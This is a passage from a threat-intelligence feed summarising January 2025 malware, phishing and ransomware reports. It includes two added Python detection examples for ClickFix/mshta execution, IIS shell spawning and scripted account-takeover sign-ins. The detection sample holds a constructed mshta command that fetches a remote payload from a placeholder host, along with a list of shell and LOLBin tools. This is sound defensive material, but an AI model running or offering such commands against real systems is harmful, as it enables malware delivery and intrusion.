Intel Source:
Threatdown
Intel Name:
Clipboard_Hijacker_Delivers_Lumma_Stealer
Date of Scan:
2025-02-01
Impact:
LOW
Summary:
Researchers from ThreatDown have observed cybercriminals combining clipboard hijacking with fake CAPTCHAs to trick users into executing malicious commands. The attackers host the fake CAPTCHAs on fraudulent websites, including fake online stores, news sites, and platforms offering music and movies. The command silently copied to the clipboard relies on the MSHTA tool to download and run a PowerShell script hidden in an image file called Nusku.jpeg, which ultimately delivers Lumma Stealer.
Source: https://www.threatdown.com/blog/more-cybercriminals-are-using-the-clipboard-hijacker-method/
2025-02-01
Email_Bombing_Campaign
LOW
+
Intel Source:
ESentire
Intel Name:
Email_Bombing_Campaign
Date of Scan:
2025-02-01
Impact:
LOW
Summary:
eSentire researchers have identified a campaign in which attackers use email bombing to compromise organisations. Recipients first receive a massive flood of spam emails; shortly afterwards they get a Microsoft Teams message from a fake IT support team, which takes advantage of Teams settings that allow external users to contact employees. The fake IT team claims it can fix the issue and requests a remote session. Once the victim agrees, the attackers gain control of the system and silently install malware that lets them persist in the environment, steal credentials, exfiltrate sensitive data and potentially deploy ransomware.
Source: https://www.esentire.com/security-advisories/ongoing-email-bombing-campaigns-leading-to-remote-access-and-post-exploitation
2025-02-01
GamaCopy_Targets_Russian_Entities
MEDIUM
+
Intel Source:
knownsec 404
Intel Name:
GamaCopy_Targets_Russian_Entities
Date of Scan:
2025-02-01
Impact:
MEDIUM
Summary:
Researchers from the Knownsec 404 Advanced Threat Intelligence team have discovered a threat actor known as "GamaCopy," who is copying the tactics of the Russian-linked Gamaredon gang to conduct attacks against Russian-speaking targets. Using military-related content as bait, the attackers use 7z self-extracting programs to deliver payloads and then use open-source tools like UltraVNC for further action.
Source: https://paper.seebug.org/3270/
2025-02-01
HellCat_and_Morpheus_RaaS_Operators
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
HellCat_and_Morpheus_RaaS_Operators
Date of Scan:
2025-02-01
Impact:
MEDIUM
Summary:
SentinelOne researchers have observed the rise of two prominent RaaS operations, HellCat and Morpheus, which let affiliates use a pre-built ransomware payload in exchange for a share of the profits. HellCat first appeared in mid-2024 and aims to establish a strong position in the cybercrime arena; it is operated by members of the BreachForums community (Rey, Pryx, Grep and IntelBroker) and primarily targets government entities. Morpheus launched its data leak site in December 2024 and operates as a semi-private RaaS, targeting the pharmaceutical and manufacturing sectors with a particular focus on VMware ESXi environments. Despite the separate brands, affiliates of both operations have been observed dropping identical payload code.
Source: https://www.sentinelone.com/blog/hellcat-and-morpheus-two-brands-one-payload-as-ransomware-affiliates-drop-identical-code/
2025-01-31
UAC_0063_Cyber_Espionage_Unveiled
LOW
+
Intel Source:
Bitdefender
Intel Name:
UAC_0063_Cyber_Espionage_Unveiled
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers at Bitdefender have discovered a sophisticated cyber-espionage operation by UAC-0063, a threat group that is spreading its activities from Central Asia to European countries. This actor initially targeted government entities and diplomatic missions in Central Asia, but has now expanded its scope to include embassies in Germany, the United Kingdom, the Netherlands, Romania, and Georgia.
Source: https://www.bitdefender.com/en-us/blog/businessinsights/uac-0063-cyber-espionage-operation-expanding-from-central-asia
2025-01-31
Exploitation_of_CVE_2019_18935_in_IIS
MEDIUM
+
Intel Source:
Esentire
Intel Name:
Exploitation_of_CVE_2019_18935_in_IIS
Date of Scan:
2025-01-31
Impact:
MEDIUM
Summary:
Researchers at eSentire have found threat actors who are abusing CVE-2019-18935, a six-year-old vulnerability in Progress Telerik UI for ASP.NET AJAX. In early January 2025, eSentire's Threat Response Unit discovered attackers utilizing the IIS worker process (w3wp.exe) to load a reverse shell and run reconnaissance commands via cmd.exe. Before gaining remote access, the attackers analyzed IIS logs for a weak file upload handler and used a tailored proof-of-concept (PoC) exploit.
Source: https://www.esentire.com/blog/threat-actors-use-cve-2019-18935-to-deliver-reverse-shells-and-juicypotatong-privilege-escalation-tool
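Two of the entries above describe process-lineage patterns that endpoint telemetry catches well: the MSHTA-based ClickFix execution from the clipboard-hijacker entry (Clipboard_Hijacker_Delivers_Lumma_Stealer), and the IIS worker process spawning cmd.exe from this Telerik entry. The block below is an added example of that detection logic written for this page; it is not code from eSentire or ThreatDown. It runs over constructed Sysmon-style process-creation events: the paths, account names and the example.invalid host are made up (only the Nusku.jpeg filename comes from the entry), and the field names are an assumption about the telemetry format.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal view of a process-creation event (Sysmon Event ID 1 style; field names assumed)."""
    image: str          # full path of the new process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process
    user: str           # account the new process runs as


# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    # benign: user opens a browser from the desktop
    ProcEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", "firefox.exe",
              r"C:\Windows\explorer.exe", r"CORP\alice"),
    # ClickFix: the pasted "CAPTCHA" command runs mshta against a remote file (hypothetical host)
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/Nusku.jpeg",
              r"C:\Windows\explorer.exe", r"CORP\alice"),
    # benign: an installer runs a local HTA
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\ProgramData\Vendor\setup.hta"',
              r"C:\Program Files\Vendor\installer.exe", r"CORP\bob"),
    # post-exploitation: IIS worker process spawns cmd.exe for reconnaissance
    ProcEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami",
              r"C:\Windows\System32\inetsrv\w3wp.exe", r"IIS APPPOOL\DefaultAppPool"),
    # benign: ASP.NET dynamic compilation spawned by the same worker process
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              "csc.exe /noconfig /nostdlib",
              r"C:\Windows\System32\inetsrv\w3wp.exe", r"IIS APPPOOL\DefaultAppPool"),
]

# Anything mshta fetches over the network is suspicious; the ClickFix lure points it at a remote "image".
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Interpreters and LOLBins a web worker process has no business launching.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, for both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def detect(events):
    """Return (rule_name, event) pairs for events matching either pattern."""
    hits = []
    for ev in events:
        image, parent = basename(ev.image), basename(ev.parent_image)
        if image == "mshta.exe" and REMOTE_URL.search(ev.command_line):
            hits.append(("mshta_remote_url", ev))
        if parent == "w3wp.exe" and image in SHELLS:
            hits.append(("iis_worker_spawns_shell", ev))
    return hits


if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"{rule}: {ev.parent_image} -> {ev.image} [{ev.user}] {ev.command_line}")
```

Two tuning choices are deliberate: mshta launching a local .hta from an installer is routine and is not flagged, only a remote URL on its command line is; and w3wp.exe spawning csc.exe is normal ASP.NET dynamic compilation, so the child list is restricted to shells and living-off-the-land binaries rather than "any child of w3wp.exe".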
2025-01-31
Fake_CAPTCHA_Scam_Targets_Crypto_Users
LOW
+
Intel Source:
Morphisec
Intel Name:
Fake_CAPTCHA_Scam_Targets_Crypto_Users
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from Morphisec have discovered a new operation in which fraudsters abuse fake CAPTCHA verification to deliver malware to cryptocurrency communities. The attack begins on X (formerly Twitter), where threat actors hijack legitimate threads to lure users into joining Telegram groups. Once inside, victims are prompted to complete a CAPTCHA with a bot impersonating the legitimate "Safeguard" verification bot, which results in the delivery of Lumma Stealer via loaders such as IDAT Loader and Emmenhtal Loader.
Source: https://www.morphisec.com/blog/captcha-chaos-lumma-stealer/
2025-01-31
Phishing_Attacks_Exploit_Cloudflare
LOW
+
Intel Source:
cloudsek
Intel Name:
Phishing_Attacks_Exploit_Cloudflare
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from the CloudSEK Threat Research Team have found an efficient phishing page that can impersonate any brand while stealing credentials through a generic login interface. The phishing site, hosted on Cloudflare's workers.dev, personalises each lure by embedding the target employee's email address in the URL, enabling targeted campaigns. To convince the victim, the page fetches a screenshot of the domain associated with the target's email address (via thum.io) and displays it as the background.
Source: https://www.cloudsek.com/blog/unmasking-cyber-deception-the-rise-of-generic-phishing-pages-targeting-multiple-brands
2025-01-31
DeepSeek_Crypto_Phishing_Scams
LOW
+
Intel Source:
Cyble
Intel Name:
DeepSeek_Crypto_Phishing_Scams
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Cyble researchers have uncovered multiple fraudulent websites impersonating DeepSeek as part of cryptocurrency phishing schemes and investment scams. DeepSeek is a Chinese AI company that recently launched its chatbot, DeepSeek – AI Assistant. The attackers exploit the attention around it by creating deceptive websites that closely mimic the legitimate DeepSeek platform and lure users into scanning a QR code to connect a cryptocurrency wallet such as MetaMask or WalletConnect. When a user scans the QR code, their wallet credentials are stolen, leading to a complete loss of funds.
Source: https://cyble.com/blog/deepseeks-growing-influence-sparks-a-surge-in-frauds-and-phishing-attacks/
2025-01-31
Coyote_Banking_Trojan
LOW
+
Intel Source:
Fortinet
Intel Name:
Coyote_Banking_Trojan
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from Fortinet have identified several malicious LNK files that use PowerShell commands to execute malicious scripts and connect to remote servers to deliver the Coyote banking trojan. The trojan mainly targets Brazil and aims to steal sensitive information from over 70 financial applications and numerous websites. Once deployed on a victim's system it performs keylogging, takes screenshots and displays fake login pages to lure users into entering their banking credentials, giving the operators access to victims' bank accounts and financial data.
Source: https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files
2025-01-31
From_PowerShell_to_a_Python_Obfuscation_Race
LOW
+
Intel Source:
ISC.SANS
Intel Name:
From_PowerShell_to_a_Python_Obfuscation_Race
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
ISC SANS analysed a malware chain that uses PowerShell to download a decoy document and set up a Python environment. It then deploys an infostealer that targets cryptocurrency wallet extensions in browsers and exfiltrates data via Telegram bots. The malware is heavily obfuscated, with multiple layers of encoding and encryption to evade detection. Key indicators include the malicious PowerShell scripts, the Python environment setup, and cryptocurrency theft via clipboard hijacking and wallet-address replacement.
Source: https://isc.sans.edu/diary/From+PowerShell+to+a+Python+Obfuscation+Race/31634/
2025-01-30
Unmasking_the_Shadow_of_PoisonPlug
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
Unmasking_the_Shadow_of_PoisonPlug
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Google Mandiant researchers have uncovered Chinese cyber-espionage operations targeting entities in Europe and the Asia-Pacific (APAC) region. These operations leverage the POISONPLUG backdoor and, in particular, its POISONPLUG.SHADOW variant. POISONPLUG is used by Chinese threat actors, while POISONPLUG.SHADOW appears to be linked to APT41. The samples are protected by a sophisticated obfuscator called ScatterBrain, which makes them hard to detect and analyse. ScatterBrain operates in three modes, Selective, Complete and Complete headerless, each offering a different level of obfuscation: Selective is used for early-stage components such as droppers, while the other modes protect later-stage components such as the final backdoor payload.
Source: https://cloud.google.com/blog/topics/threat-intelligence/scatterbrain-unmasking-poisonplug-obfuscator/
2025-01-30
SparkRAT_Malware_Target_Multiple_Operating_Systems
LOW
+
Intel Source:
Hunt.IO
Intel Name:
SparkRAT_Malware_Target_Multiple_Operating_Systems
Date of Scan:
2025-01-30
Impact:
LOW
Summary:
Researchers from Hunt.IO have analysed SparkRAT, an open-source remote access trojan that has been available on GitHub since 2022. It is written in Go and uses the WebSocket protocol to communicate with its C2 servers. The RAT is popular among cybercriminals because of its modular design, user-friendly interface and multi-platform support for Windows, macOS and Linux. Its capabilities include managing files and processes, running system commands, stealing sensitive data, taking screenshots, and shutting down or restarting the host.
Source: https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections
2025-01-30
New_Phishing_Campaign_Impersonating_Amazon
LOW
+
Intel Source:
Palo Alto
Intel Name:
New_Phishing_Campaign_Impersonating_Amazon
Date of Scan:
2025-01-30
Impact:
LOW
Summary:
Palo Alto Networks researchers have identified a campaign in which attackers target Amazon Prime members to steal their credit card details. The attackers send emails with malicious PDF attachments that appear legitimate. The PDFs contain links that redirect users through a series of URLs before landing on a fake Amazon page. This deceptive site is designed to trick users into entering their credit card information, which is then captured by the attackers.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-24-IOCs-for-phishing-campaign-impersonating-amazon.txt
2025-01-30
Lynx_The_Ransomware_as_a_Service_Group
MEDIUM
+
Intel Source:
Group-IB
Intel Name:
Lynx_The_Ransomware_as_a_Service_Group
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Researchers at Group-IB have analysed Lynx, a RaaS group that provides advanced tooling and a structured platform for its affiliates to launch ransomware attacks. The affiliate panel is user-friendly and divided into sections such as News, Companies, Chats, Stuffers and Leaks, letting affiliates manage victim profiles, customise ransomware payloads and schedule data leaks from a single interface. The group provides a ransomware toolkit called "All-in-One Archive" that works across Windows, Linux and ESXi so that affiliates can target diverse IT environments. Lynx uses double-extortion tactics and allows affiliates to tune encryption settings to the requirements of each attack.
Source: https://www.group-ib.com/blog/cat-s-out-of-the-bag-lynx-ransomware/
2025-01-30
Astral_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
Astral_Stealer
Date of Scan:
2025-01-30
Impact:
LOW
Summary:
Researchers from CYFIRMA have analysed Astral Stealer, an information stealer designed to harvest sensitive data and maintain persistence on infected systems. It is written in Python, C# and Java and offers functions such as credential dumping, browser injection and data exfiltration through webhooks. It is available on GitHub, where attackers can use its built-in features; paid tiers add capabilities such as tracking backup codes, automatically changing account email addresses, and capturing newly entered credit cards and passwords across additional targeted platforms.
Source: https://www.cyfirma.com/research/astral-stealer-analysis/
2025-01-30
Exploitation_of_HTTP_Clients_in_ATO_Attacks
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
Exploitation_of_HTTP_Clients_in_ATO_Attacks
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Proofpoint findings reveal that 78% of Microsoft 365 tenants were targeted by account-takeover attempts carried out with scripted HTTP client tools. While most of these attacks rely on brute force and have low success rates, one campaign using the Axios client achieved a 43% success rate in compromising targeted accounts. Researchers also identified a high-velocity brute-force campaign using the Node Fetch client. Attackers increasingly repurpose legitimate HTTP client libraries, often sourced from public repositories, for adversary-in-the-middle (AitM) relays and brute-force attacks, leading to more account-takeover incidents.
Source: https://www.proofpoint.com/us/blog/threat-insight/http-client-tools-exploitation-account-takeover-attacks
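The two behaviours in this entry, a high-velocity brute-force run from a library client and a scripted client with an unusually high sign-in success rate, can be separated in identity-provider sign-in logs by grouping attempts per HTTP client family. The block below is an added example of that analysis, not Proofpoint's code; it works on a constructed sign-in log (timestamp, user, outcome, user agent, source IP), and the field layout, thresholds and sample events are assumptions. Only the user-agent strings are real: they follow the default formats of the axios and node-fetch libraries.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class SignIn:
    """One sign-in attempt as an IdP would log it (field names assumed)."""
    ts: datetime
    user: str
    success: bool
    user_agent: str
    source_ip: str


# Library user agents that interactive end users never present to an identity provider.
SCRIPTED_CLIENTS = ("axios", "node-fetch", "python-requests", "go-http-client", "okhttp", "curl")


def ua_family(user_agent: str) -> str:
    """Collapse a raw user-agent string to the HTTP client library it names."""
    ua = user_agent.lower()
    for name in SCRIPTED_CLIENTS:
        if name in ua:
            return name
    return "browser/other"


def build_sample_signins():
    """Constructed log: a node-fetch password spray, a few axios sign-ins, normal browser logins."""
    base = datetime(2025, 1, 30, 9, 0, 0)
    events = []
    # 150 failed attempts against 150 different users inside 90 seconds (spray)
    for i in range(150):
        events.append(SignIn(base + timedelta(milliseconds=600 * i), f"user{i:03d}@corp.example",
                             False, "node-fetch/1.0 (+https://github.com/bitinn/node-fetch)",
                             "203.0.113.10"))
    # 10 axios sign-ins spread over three hours, 4 of them successful (credentials replayed from a kit)
    for i in range(10):
        events.append(SignIn(base + timedelta(minutes=18 * i), f"victim{i}@corp.example",
                             i < 4, "axios/1.7.9", "198.51.100.23"))
    # interactive browser logins, mostly successful
    for i in range(20):
        events.append(SignIn(base + timedelta(minutes=7 * i), f"user{i:03d}@corp.example",
                             i % 10 != 0, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/134.0",
                             "198.51.100.7"))
    return events


def analyze(events, min_attempts=5, velocity_per_min=60.0, success_rate=0.3):
    """Per user-agent family: volume, velocity and success rate, plus alerts for the two patterns."""
    by_family = defaultdict(list)
    for ev in events:
        by_family[ua_family(ev.user_agent)].append(ev)
    stats, alerts = {}, []
    for family, evs in by_family.items():
        evs.sort(key=lambda e: e.ts)
        attempts = len(evs)
        successes = sum(1 for e in evs if e.success)
        span_s = max((evs[-1].ts - evs[0].ts).total_seconds(), 1.0)
        per_min = attempts / span_s * 60.0
        rate = successes / attempts
        stats[family] = {"attempts": attempts, "successes": successes,
                         "users": len({e.user for e in evs}),
                         "per_min": round(per_min, 1), "success_rate": round(rate, 2)}
        if family == "browser/other" or attempts < min_attempts:
            continue                      # browsers are judged by other rules; tiny samples are noise
        if per_min >= velocity_per_min:
            alerts.append((family, "high_velocity_bruteforce"))
        if rate >= success_rate:
            alerts.append((family, "scripted_client_high_success"))
    return stats, alerts


if __name__ == "__main__":
    stats, alerts = analyze(build_sample_signins())
    for family, s in stats.items():
        print(family, s)
    print("alerts:", alerts)
```

The second rule is the one that matters for the Axios campaign: a library client with a 40% success rate is not guessing, it is replaying credentials captured elsewhere, so the response is to revoke sessions and reset the affected users rather than only block the source IP.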
2025-01-29
Phorpiex_Botnet_Delivers_LockBit_Ransomware
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
Phorpiex_Botnet_Delivers_LockBit_Ransomware
Date of Scan:
2025-01-29
Impact:
MEDIUM
Summary:
Cybereason researchers have analysed Phorpiex, also known as Trik, an infamous botnet active since 2010 and known for spam campaigns, cryptocurrency mining and post-exploitation malware delivery. In this campaign the operators use Phorpiex to deliver LockBit Black (aka LockBit 3.0): the downloader variant fetches and executes the ransomware automatically. The botnet is primarily distributed through phishing emails carrying attachments such as Microsoft Word documents, PDFs or executables. Its operators sell access as a botnet-as-a-service, allowing other cybercriminals to distribute ransomware such as LockBit at scale.
Source: https://www.cybereason.com/blog/threat-analysis-phorpiex-downloader
2025-01-29
SapphireRAT_Targeting_Latin_American
LOW
+
Intel Source:
Cofense
Intel Name:
SapphireRAT_Targeting_Latin_American
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
Cofense researchers have uncovered a series of attacks that use fake legal documents, such as judicial notifications, to distribute and run SapphireRAT. The malware is hidden in deceptive legal documents designed to trick recipients into opening and executing them. Once the victim runs the file, the RAT gives the attacker control of the system, allowing them to steal sensitive data or disrupt key operations. The attacks mainly target organisations in Latin America, where attackers are after valuable data and critical infrastructure.
Source: https://cofense.com/blog/malware-alert-fake-judicial-review-emails-deliver-sapphirerat-targeting-latin-american-victims
2025-01-29
SystemBC_RAT_Targeting_Linux_Based_Platforms
LOW
+
Intel Source:
Any.Run
Intel Name:
SystemBC_RAT_Targeting_Linux_Based_Platforms
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
ANY.RUN researchers have analysed a SystemBC RAT variant targeting Linux-based platforms. The RAT is used to create proxy implants inside victims' networks, targeting internal corporate services such as the company network, cloud servers and IoT devices. A proxy implant lets attackers pivot through the network without drawing attention. It uses an encrypted channel to its C2 servers so that the implant stays reachable from the attackers' infrastructure across both Windows and Linux systems.
Source: https://x.com/anyrun_app/status/1884207667058463188
2025-01-29
Attackers_Exploit_Government_Website
LOW
+
Intel Source:
Cofense
Intel Name:
Attackers_Exploit_Government_Website
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
Cofense researchers have found that threat actors have been abusing .gov domains from various countries for phishing over the past two years. The domains are used to host phishing pages, redirect users to malicious websites, or act as C2 servers for malware. Most of the compromised .gov domains are linked to CVE-2024-25608, an open-redirect vulnerability in the Liferay digital experience platform widely used by government organisations, which allows an attacker to bounce users from a legitimate website to a phishing site. Brazil and the U.S. are the countries most affected.
Source: https://cofense.com/blog/threat-actors-exploit-government-website-vulnerabilities-for-phishing-campaigns
2025-01-28
Ransomware_Groups_Targeting_Healthcare_Sector
MEDIUM
+
Intel Source:
Any.Run
Intel Name:
Ransomware_Groups_Targeting_Healthcare_Sector
Date of Scan:
2025-01-28
Impact:
MEDIUM
Summary:
ANY.RUN researchers have observed that many ransomware groups target the healthcare sector because it is underfunded and runs vulnerable infrastructure, making hospitals easy and profitable targets. The attackers encrypt health data and demand a ransom; because downtime directly affects patient care, many healthcare providers cannot afford it and are under pressure to pay. Interlock is one of the prominent groups targeting healthcare with double-extortion tactics; in 2024 it attacked multiple healthcare facilities in the United States, disrupting operations and exfiltrating patient information.
Source: https://any.run/cybersecurity-blog/interlock-ransomware-attack-analysis/
2025-01-28
Phishing_Pages_Targeting_Online_Shoppers
LOW
+
Intel Source:
Palo Alto
Intel Name:
Phishing_Pages_Targeting_Online_Shoppers
Date of Scan:
2025-01-28
Impact:
LOW
Summary:
Researchers at Palo Alto Networks uncovered a campaign in which attackers impersonate well-known online shopping websites. The fake sites reuse the same template and design to appear legitimate. The campaign, which started in November 2024, entices users to enter their phone number and password on a counterfeit login page. Once credentials are submitted the page displays "This account does not exist", but the credentials have already been sent to the attacker's server rather than being validated.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-24-IOCs-for-phishing-pages-targeting-online-shoppers.txt
2025-01-27
Lumma_Stealer_Malware_Update
LOW
+
Intel Source:
Esentire
Intel Name:
Lumma_Stealer_Malware_Update
Date of Scan:
2025-01-27
Impact:
LOW
Summary:
eSentire researchers have observed that the developers of Lumma Stealer have switched to the ChaCha20 cipher for protecting its embedded configuration, which the malware decrypts at runtime; configuration extractors built for the previous scheme need to be updated accordingly. Lumma Stealer, also known as LummaC2, steals sensitive information and is operated as malware-as-a-service (MaaS). It is often distributed through the ClickFix technique, in which victims are tricked into executing malicious commands themselves.
Source: https://www.esentire.com/blog/lumma-stealer-malware-updated-to-use-chacha20-cipher-for-config-decryption
2025-01-23
Secret_Blizzard_Part2
LOW
+
Intel Source:
Microsoft
Intel Name:
Secret_Blizzard_Part2
Date of Scan:
2025-01-23
Impact:
LOW
Summary:
Microsoft Threat Intelligence has reported that the Russian nation-state actor known as Secret Blizzard has been exploiting the tools and infrastructure of other cybercriminal groups to target Ukrainian military devices. Between March and April 2024, Secret Blizzard used the Amadey bot malware, associated with the cybercriminal group Storm-1919, to deploy its custom backdoors, including Tavdig and KazuarV2, on select Ukrainian military systems. This marks the second time since 2022 that Secret Blizzard has leveraged cybercrime infrastructure to gain access to its targets. Additionally, Secret Blizzard has co-opted tools from another Russian threat actor, Storm-1837, which focuses on Ukrainian military drone operators, to further infiltrate and compromise devices. These activities reflect a strategic approach by Secret Blizzard to diversify its attack vectors, including spear phishing, web compromises, and adversary-in-the-middle campaigns, while focusing on long-term espionage, particularly against defense-related sectors.
Source: https://www.microsoft.com/en-us/security/blog/2024/12/11/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine/
2025-01-23
Clop_Exploits_Cleo_Vulnerabilities
LOW
+
Intel Source:
Imperva
Intel Name:
Clop_Exploits_Cleo_Vulnerabilities
Date of Scan:
2025-01-23
Impact:
LOW
Summary:
Researchers at Imperva have observed the Clop ransomware group exploiting critical vulnerabilities (CVE-2024-50623 and CVE-2024-55956) in Cleo's managed file transfer software. The flaws allow unauthenticated attackers to upload files and execute arbitrary commands, leading to data exfiltration and malicious payload execution. Imperva has tracked over one million exploitation attempts against almost 10,000 sites, concentrated in the United States and Australia and affecting sectors such as finance and government.
Source: https://www.imperva.com/blog/imperva-protects-against-the-exploited-cves-in-the-cleo-data-theft-attacks/
2025-01-22
InvisibleFerret_Malware
LOW
+
Intel Source:
Any.Run
Intel Name:
InvisibleFerret_Malware
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
ANY.RUN researchers have observed an increase in North Korean cyber-espionage campaigns that use fake job interviews to distribute malware. Two malware families, BeaverTail and InvisibleFerret, are distributed as part of this campaign, also known as Contagious Interview or DEV#POPPER, which targets individuals in the tech, financial and cryptocurrency sectors. BeaverTail is the first-stage malware: it downloads a custom Python environment and deploys InvisibleFerret, which operates silently without leaving obvious traces or logs.
Source: https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/
2025-01-22
Critical_Fortinet_Zero_Day_CVE_2024_55591
LOW
+
Intel Source:
Cyble
Intel Name:
Critical_Fortinet_Zero_Day_CVE_2024_55591
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
Researchers at Cyble have observed active exploitation of a critical zero-day vulnerability, CVE-2024-55591, in FortiOS and FortiProxy, which attackers are using to obtain super-admin privileges. This authentication-bypass flaw, rated 9.6 on CVSSv3, is reached through crafted requests to the Node.js WebSocket module of the management interface, giving an unauthenticated remote attacker access to administrative functions. Beyond patching, Fortinet's published workaround is to disable HTTP/HTTPS administrative access on exposed interfaces or restrict it to trusted source addresses with local-in policies.
Source: https://cyble.com/blog/cve-2024-55591-the-fortinet-flaw-putting-critical-systems-at-risk/
2025-01-22
SilentLynx_APT_Targets_Kyrgyzstan
LOW
+
Intel Source:
Seqrite
Intel Name:
SilentLynx_APT_Targets_Kyrgyzstan
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
Researchers from Seqrite Labs have uncovered two campaigns by a threat actor they call Silent Lynx, which targets organisations in Eastern Europe and Central Asia. The group focuses on entities such as government think tanks, banks and economic decision-making bodies, and its recent campaigns target Kyrgyzstan: the first is themed around the National Bank of the Kyrgyz Republic, while the second targets the Ministry of Finance of Kyrgyzstan. Both campaigns begin with phishing emails carrying a RAR attachment that contains a decoy document to distract the victim.
Source: https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/
2025-01-21
Phishing_Campaign_Targets_Financial_Data
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Phishing_Campaign_Targets_Financial_Data
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Researchers from CERT-AGID have uncovered an ongoing phishing campaign that impersonates the Italian Ministry of Health. The attackers use the Ministry's logo and name in emails claiming a refund of €265.67 from the National Health Service; a link redirects recipients to a fake page asking for personal details and credit card information. Victims are then asked to re-enter their card details on a second page, which increases the attackers' chances of collecting additional data.
Source: https://cert-agid.gov.it/news/false-comunicazioni-del-ministero-della-salute-sfruttate-per-phishing-finanziario/
2025-01-21
Raspberry_Robin_Update_Exploits_CVE_2024_38196
LOW
+
Intel Source:
Zscaler ThreatLabz
Intel Name:
Raspberry_Robin_Update_Exploits_CVE_2024_38196
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Zscaler ThreatLabz reports that the Raspberry Robin malware has been updated with a local privilege-escalation exploit for CVE-2024-38196, a Windows elevation-of-privilege vulnerability that lets an attacker elevate privileges on an affected system and carry out further actions with elevated permissions.
Source: https://x.com/Threatlabz/status/1879956781360976155
2025-01-21
Nnice_Ransomware_Targeting_Windows
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
Nnice_Ransomware_Targeting_Windows
Date of Scan:
2025-01-21
Impact:
MEDIUM
Summary:
CYFIRMA researchers have identified a new ransomware strain called Nnice, which is targeting Windows systems. This ransomware uses advanced encryption techniques, appending the .xdddd extension to encrypted files. It also changes the system wallpaper and leaves a ransom note ("Readme.txt") with recovery instructions.
Source: https://www.cyfirma.com/research/nnice-ransomware/
2025-01-21
Sliver_Implant_Targets_German_Entities
LOW
+
Intel Source:
Cyble
Intel Name:
Sliver_Implant_Targets_German_Entities
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Researchers at Cyble have found a sophisticated attack targeting German entities that uses DLL sideloading, proxying techniques, and the Sliver framework. The attack begins with a deceptive LNK file placed in an archive which, when executed, initiates a chain of events involving a genuine program (wksprt.exe) that sideloads a malicious DLL.
Source: https://cyble.com/blog/sliver-implant-targets-german-entities-with-dll-sideloading-and-proxying-techniques/
2025-01-21
Return_of_QBot
LOW
+
Intel Source:
Walmart Global Tech
Intel Name:
Return_of_QBot
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
QBot, also known as Pinkslipbot, is malware that has been active since 2007. It started as a banking trojan that stole financial information but has since become a flexible tool for stealing data and distributing other malware through C2 servers. Law enforcement agencies disrupted QBot's operations in May 2024, but recent signs indicate that the operators are active again. Moreover, the group has developed new malware called Backconnect, which is linked to ransomware operators, especially Black Basta.
Source: https://medium.com/walmartglobaltech/qbot-is-back-connect-2d774052369f
2025-01-19
IoT_Botnet_Targets_Global_Networks
LOW
+
Intel Source:
Trend Micro
Intel Name:
IoT_Botnet_Targets_Global_Networks
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Trend Micro have observed large-scale DDoS attacks orchestrated by an IoT botnet, targeting enterprises primarily in Japan but also abroad. The botnet, which includes malware variants derived from Mirai and Bashlite, compromises IoT devices such as wireless routers and IP cameras by exploiting vulnerabilities and weak passwords. The infected devices communicate with command-and-control servers to launch various DDoS attacks, update the malware, and provide proxy services.
Source: https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
2025-01-19
SEO_Manipulation_by_Gootloader
LOW
+
Intel Source:
Sophos
Intel Name:
SEO_Manipulation_by_Gootloader
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
